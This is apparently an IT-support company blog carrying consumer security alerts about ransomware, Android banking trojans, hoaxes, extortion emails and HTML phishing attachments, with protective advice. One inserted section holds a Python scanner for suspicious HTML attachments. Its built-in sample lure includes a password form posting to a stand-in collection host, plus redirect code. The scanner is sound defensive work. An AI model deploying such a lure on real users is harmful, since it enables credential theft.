Technology by Design

Technology news, reviews, and how to keep your technology running fast and smooth!


Startup GRAIL closes $900 million in Series B funding.

March 7, 2017 by The T By D Team

Not our everyday computer post around here, but I found it nice that in among all the Crowdfunding programs that give money to stupid things every day like digging holes and filling them, GRAIL, a startup that hopes to try and catch the early stages of cancer before it takes hold in the body, is well on its way to 1 billion dollars and could climb to upwards of 1.8 billion. It's nice to see a feel good tech story once in a while instead of all the ransomware alerts that have become part of the daily culture. Here’s to hoping they are able to perfect the technology and make a difference!

Early cancer detection startup GRAIL closes on $900 million in Series B funding

Filed Under: Blogs, Featured

New Hybrid Support Scam/Ransomware

March 7, 2017 by The T By D Team

Ransomware and Support Scams used to be separate entities, but now there is a new breed that is basically a hybrid of the two. If a user unsuspectingly downloads the malware from a phony Adobe update link or compromised ad, the malware will automatically run at each startup, taking over the entire screen with the fake warning. Advanced users may know how to dismiss or remove the screen, but to the untrained eye, these do look like Microsoft alerts. To those users, the only way to fix the issue seems to be to contact support at an 800 number. Once the victim calls, they are asked to launch a built-in TeamViewer feature and pay $250 for the fix. Infected and need help? Give us a call.

Filed Under: ALERTS, Featured

ALERT: New Facebook Hoax

June 29, 2016 by The T By D Team

A new version of an old hoax is spreading fast through Facebook pages everywhere.

CyberCriminals are cashing in on people’s fear that Facebook is going to start charging for its service.

The message specifics vary, but the gist of the message is that Facebook is going to start charging for Facebook accounts sometime in the near future (times vary from “tomorrow” to “this summer”). The message goes on to state that if current users copy and paste the message into their own status, their icon will turn blue, and their account will be “safe”.

This is a new version of an old hoax, which began circulating as early as 2006.

A Simple Rule of Thumb Regarding Social Media

Any message that claims that a particular online service provider will start charging you or will close your account unless you send on the information to others, is a hoax.  If you receive this Facebook version, or any of the other versions of this hoax, please DO NOT pass it on to others.  Reposting does nothing other than clutter social networks and inboxes with even more useless information.  Also, CyberCriminals have ways of collecting (read “make $$$$”) off of such scams.  

You can’t stop CyberCriminals from targeting your company or employees.
But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

Filed Under: ALERTS, Blogs, Featured

ALERT: New Ransomware Targets MS Office 365 Users

June 28, 2016 by The T By D Team

A new strain of the Cerber Ransomware is targeting MS Office 365 email users with a massive attack that has the ability to bypass Office 365’s built-in security tools.

A report recently released by cloud security provider Avanan shows a massive zero-day attack targeting Office 365 users with phishing emails containing attachments with malicious files.

Microsoft reported in its 1st quarter of 2016 that there are almost 18.2 million Office 365 subscribers.  And while Avanan does not specify the number of users that have been hit by the ransomware, Avanan does state:

“While difficult to precisely measure how many users got infected, roughly 57 percent of organizations using Office 365 received at least one copy of the malware into one of their corporate mailboxes during the time of attack.”

The Cerber Ransomware uses the ever-popular social engineering to try to trick users into allowing macros, very similar to the recent Locky and Dridex attacks. The difference is that Cerber not only encrypts user files and displays a ransom note, but also takes over the user’s audio system to read out its ransom note, informing them that their files were encrypted.

How To Protect Yourself

I’d love to tell you that there was some magic potion to sprinkle, or some magic software to download, that would keep you safe from Cerber Ransomware.  However, the steps to avoid becoming a victim to this strain of ransomware, are much like the steps to avoid the rest:

  1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  Nothing beats a good, reliable backup!  Backing up your data now can prevent a lot of expensive headaches in the future.
  2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
  3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
  4. Educate.  Educate.  Educate. Make sure employees and coworkers know about current viruses/malware, and what to look for.  Print & post our “Red Flag Emails” for easy reference on what to look for in scam emails.
  5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
  6. Block Extensions via Email.  A good spam blocker will usually handle this for you.
  7. Limit permissions.  Allow read/write access only when necessary.
  8. Avoid mapping network shares.  If you have to use them, hide them whenever possible.  This is sometimes as simple as appending a “$” to your share name.

 


Filed Under: ALERTS, Blogs, Featured

ALERT: FBI Warns Email Extortion Heating Up for Summer!

June 7, 2016 by The T By D Team

The FBI’s Internet Crime Complaint Center (IC3) has issued a warning that email extortion campaigns have heated up recently. The IC3 states that the recent increase in email extortion stems from recent data breaches at companies such as Ashley Madison, the IRS, Anthem, and others, where millions of records with highly personal information were stolen.


With extortion email scams, victims are informed that the CyberCriminals have their highly personal information.  The victims are instructed to pay, usually within a short time period.  The ransom amount typically ranges between 2-5 Bitcoins (approximately $300-$1400 US, depending on exchange rates).

Victims are told that if they do not pay the ransom, their personal information (such as name, phone number, address, credit card info, and other confidential information) will be sent to the victim’s social media contacts, family, and friends.

Do NOT answer these demands, and do NOT pay anything.

If you do, your data will be sold to other scammers who will continue to haunt & extort you for further funds.

Report this scam to the FBI’s Internet Crime Complaint Center (IC3), at:  http://www.ic3.gov/default.aspx


Filed Under: ALERTS, Blogs, Featured

ALERT: Evil Android Trojan Empties Your Bank Account

May 17, 2016 by The T By D Team

The FBI has identified 2 versions of malware for Android (SlemBunk and Marcher) actively phishing for financial institutions’ customer credentials. According to cyber threat security reports, both types of malware have targeted foreign financial institutions since 2014, gradually broadening the list to include Western banks, and have been offered for lease or purchase in underground forums.

SlemBunk apps often masquerade as common, popular applications, and stay incognito after running the 1st time. They have the ability to phish for, and harvest, authentication credentials when specified banking and other similar apps are launched. SlemBunk currently spoofs the apps of 31 banks across the globe – some of which are among the biggest banks in the world – as well as the apps of 2 popular mobile payment service providers.

Users will only get infected if the malware is accidentally downloaded from a malicious website; the new version of the malware is being distributed by porn websites. Users who visit these sites are incessantly prompted to download an Adobe Flash update to view the porn, and doing so downloads the malware.

When the app is launched for the 1st time, it activates the registered receiver, which subsequently starts the monitoring service in the background.  On the surface, it pops up a fake UI claiming to be Adobe Flash Player, or whatever it was advertised as being, and requests to be the device admin.  Upon being granted admin privileges, it removes the fake icon from the device, and the malware monitors the infected phone for the launch of a targeted mobile banking app.  When a mobile banking/payment app is launched, the malware injects a phishing overlay over the legitimate banking/payment app’s user interface (aka login screen).  The malware then uses the fake login screen to steal the victim’s banking credentials.

How to Avoid Mobile Device Malware:
  1. If you receive a pop-up telling you that you need to download Adobe Flash or any other software, whether you’re on your desktop or on your mobile device, go directly to the Adobe website or the app store (type it in the address bar), and download it from there.
  2. Keep Android devices updated.

Filed Under: ALERTS, Blogs, Featured

ALERT: HTML Attachments

May 10, 2016 by The T By D Team

In the past, spam filters have been able to catch most malicious emails based on the types of attachments they carried (the emails try to trick people into opening the attachments, which then download malicious files onto your device). Most of the malicious attachments used in the past were “.DOC” or “.JS” files, used mainly for ransomware attacks.

Now, CyberCriminals are trying to trick spam filters into letting their malicious emails through, by sending .HTML attachments, also known as “attackments”.

CyberCriminals are using these attackments for credential “phishing” for a few reasons.  Namely:

  1. Reduced chance of anti-virus detection:  Carefully crafted .HTML files can reduce the chances that phishing emails with these attachments will be stopped by email security software or devices.  .HTML files are not commonly associated with email-borne attacks (at least, not until recently).  .HTML files can be used to embed redirects that can evade antivirus scanners that check only URLs that appear in the bodies of emails.  .HTML files can also be used to deliver obscure web pages that might slip past scanners that do check .HTML attachments.
  2. Users are familiar with these attachments, and usually don’t see them as harmful.  Users and employees may be familiar with .HTML attachments, as they are often used by banks and other financial institutions to send secure information and documents.  If your company routinely interacts with financial institutions, your employees may view .HTML attachments as simply routine and non-threatening.


Unfortunately, CyberCriminals have recently taken to using .HTML attachments to spoof bank login pages, popular online services, and secure messages from financial institutions (financial institutions often use “.HTML” attachments to send secure messages).

Your spam filters may miss these because of the “.HTML” file type.
If you receive an email with an .HTML attachment, be wary!  
Do not open it unless you know 100% that it is legitimate, have requested the link to be sent, or have verified with the sender that the attachment is legitimate.
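
An added example, not part of the original post: a Python check that opens each .HTML attachment of a message and reports the constructs described above (embedded redirects, and login forms that post to a remote host). The sample message, the file names and the `example.invalid` hosts are constructed for illustration.

```python
# Added example: audit .html/.htm e-mail attachments for embedded redirects
# and remote-posting login forms. Hosts, names and messages are constructed.
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

JS_REDIRECT = re.compile(r"location(\.href)?\s*=|location\.(replace|assign)\s*\(", re.I)


class AttachmentAudit(HTMLParser):
    """Collects (kind, detail) findings while parsing one HTML attachment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._form_action = None  # action URL of the enclosing <form>, if any
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "form":
            self._form_action = a.get("action", "")
        elif tag == "input" and a.get("type", "").lower() == "password":
            host = urlparse(self._form_action or "").netloc
            if host:  # password field whose form submits to a remote host
                self.findings.append(("password-form-remote", host))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and JS_REDIRECT.search(data):
            self.findings.append(("script-redirect", data.strip()[:60]))


def scan_message(raw: bytes) -> dict:
    """Return {attachment filename: [findings]} for each HTML attachment."""
    report = {}
    for part in message_from_bytes(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        text = part.get_payload(decode=True).decode("utf-8", errors="replace")
        audit = AttachmentAudit()
        audit.feed(text)
        audit.close()
        report[name] = audit.findings
    return report


def build_sample() -> bytes:
    """Constructed message: URL-free body, one lure and one benign attachment."""
    lure = (
        '<html><head><meta http-equiv="refresh" '
        'content="5; url=https://portal.example.invalid/next"></head><body>'
        '<form action="https://collect.example.invalid/post" method="post">'
        '<input name="user"><input type="password" name="pass"></form>'
        '<script>window.location.href = "https://portal.example.invalid/";</script></body></html>'
    )
    benign = "<html><body><h1>Monthly statement</h1><p>No forms here.</p></body></html>"
    msg = EmailMessage()
    msg.set_content("Your secure message is attached.")  # nothing for a body-URL scanner
    msg.add_attachment(lure, subtype="html", filename="SecureMessage.html")
    msg.add_attachment(benign, subtype="html", filename="statement.htm")
    return msg.as_bytes()
```

Calling `scan_message(build_sample())` returns three findings for `SecureMessage.html` and an empty list for `statement.htm`, even though the message body itself contains no URL.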

 


Filed Under: ALERTS, Blogs, Featured

ALERT: New Ransomware Also Steals Your Bitcoins

April 26, 2016 by The T By D Team

With the rash of new ransomware strains out there, you knew they were going to up the ante somehow…

CryptXXX is built by the same CyberCriminals that are behind the Reveton malware. It is an attempt to one-up the release of the Locky ransomware by their CyberCriminal competitors.

CryptXXX currently spreads through the Angler Exploit Kit, which infects the PC with the Bedep Trojan, which in turn drops information theft software on the PC; the files are then encrypted with professional-grade encryption, and a “.crypt” extension is added to the filenames.

This ransomware encrypts files locally, and on all mounted drives, and demands $500 in Bitcoin per PC to unlock the encrypted files. However, they continue to add insult to injury by also stealing Bitcoins, as well as a large range of data.

CryptXXX tries to avoid detection through “random delayed” execution (which makes it harder to connect the infection to the delivery vector), anti-Virtual Machine, and anti-analysis functions (e.g. checking CPU names in the registry, monitoring for mouse events).

The CyberCriminals behind this ransomware are highly skilled and experienced, which means this is professional-grade ransomware. Proofpoint researchers report “Those [ransomware infections] associated with more experienced [CyberCriminals], (such as Locky) have become widespread quickly…Given Reveton’s long history of successful and large-scale malware distribution, we expect CryptXXX to become widespread. Based on the large number of translations available for the [Bitcoin] payment page, it appears that the Reveton team shares those expectations.”

The ransomware will initially be spread through drive-by downloads, but a deluge of phishing emails can be expected to follow shortly.

What Can You Do to Avoid Becoming a Ransomware Victim:
  1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  Nothing beats a good, reliable backup!  Backing up your data now can prevent a lot of expensive headaches in the future.
  2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
  3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
  4. Educate.  Educate.  Educate. Make sure employees and coworkers know about current viruses/malware, and what to look for.  Print & post our “Red Flag Emails” for easy reference on what to look for in scam emails.
  5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
  6. Block Extensions via Email.  A good spam blocker will usually handle this for you.
  7. Limit permissions.  Allow read/write access only when necessary.
  8. Avoid mapping network shares.  If you have to use them, hide them whenever possible.  This is sometimes as simple as appending a “$” to your share name.

Filed Under: ALERTS, Blogs, Featured

ALERT: Prince’s Last Words

April 22, 2016 by The T By D Team

Yesterday, news broke that Prince (aka Prince Rogers Nelson) was found dead in his home in Minneapolis at age 57.

CyberCriminals, eager as always to take advantage of any tragedy, are up to their same tricks. A series of email scams are currently being circulated, one of which is most likely to be a supposed video of Prince’s last words (this is a frequent scam to use after an especially unexpected celebrity death).

Whatever ploy is being used, you can be sure it will end with infected computers at home or in the office, personal information given out, or ransomware unleashed on the network.

Beware of any email, attachments, any social media, texts on your phone…anything.

Another heads-up:

With the recent earthquakes in Ecuador and Japan, there are charity scams rearing their ugly heads. If you want to make donations, please go to your favorite charity website directly by opening your browser and typing their link in the address bar. DO NOT click on any links or open any attachments in emails.


Filed Under: ALERTS, Blogs, Featured

ALERT: Jigsaw Sinks to New Low…Even for Ransomware

April 21, 2016 by The T By D Team

Being infected by ransomware is bad enough. Add in being taunted by old horror movie pictures while it slowly deletes your encrypted files, all while increasing the ransom demand, until you pay for the decryption key. And if you reboot your PC, you’re punished with the instant deletion of 1,000 of your files.

Jigsaw, a new strain of ransomware, tries to increase the pressure on victims to pay by referencing the horror movie “Saw”. In fact, the ransomware is named after the film’s fictional serial killer John Kramer’s nickname, the “Jigsaw Killer”. The ransomware, still drawing motivation from the horror movie, communicates with victims using a puppet called “Billy”, and uses the red clock to count down to the deadlines imposed, both of which are used by the killer in the movie. However, in the case of the ransomware, the clock shows victims how much time is left before more files get deleted and the ransom demand increases. After 72 hours, the ransomware deletes every encrypted file on the PC.


How the ransomware attack unfolds, as seen on an infected PC. (Source:  Forcepoint.)

This latest version, in a long list of versions, “appears to have been coded on March 23 and to have been used in live attacks by the end of the month”, states Andy Settle, head of special investigations at Raytheon’s cybersecurity business Forcepoint. “This malicious program starts encrypting your files while adding, with no irony, the ‘.FUN’ file extension.”

“Using horror movie images and references to cause distress in the victim is a new low.”

Jason Sumalapao, malware analyst at Trend Micro, states in a blog post that the ransom note exists in both English and Portuguese-language versions, and that the lowest possible amount that victims can pay, before the demand starts increasing, ranges from $20 to $150 USD in bitcoins.

Jigsaw appears to be distributed through adware and “grayware” (potentially unwanted applications, such as free toolbars), as well as through ‘adult content’ sites, reports Trend Micro.  

Forcepoint states that the producers of Jigsaw attempted to prevent detection by writing the ransomware in ‘.NET’ code. However, this attempt failed, and security researchers have been able to recover the encryption key, as well as 100 different bitcoin payment addresses. This information has since been shared with authorities. Since the encryption key was discovered, security researchers have been able to publish instructions on how to remove Jigsaw infections. However, it’s probably not long before Jigsaw producers correct the coding error that led to the discovery of the decryption key.

How to Avoid Jigsaw and Other Ransomware:
  1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  
  2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
  3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
  4. Educate.  Educate.  Educate.  Keep all employees and coworkers informed about current security threats, and what to look for.  Check out our “Red Flag Emails” for tips on what to look for in scam emails.
  5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
  6. Block Extensions via Email.  A good spam blocker will usually handle this for you.

 


Filed Under: ALERTS, Blogs, Featured
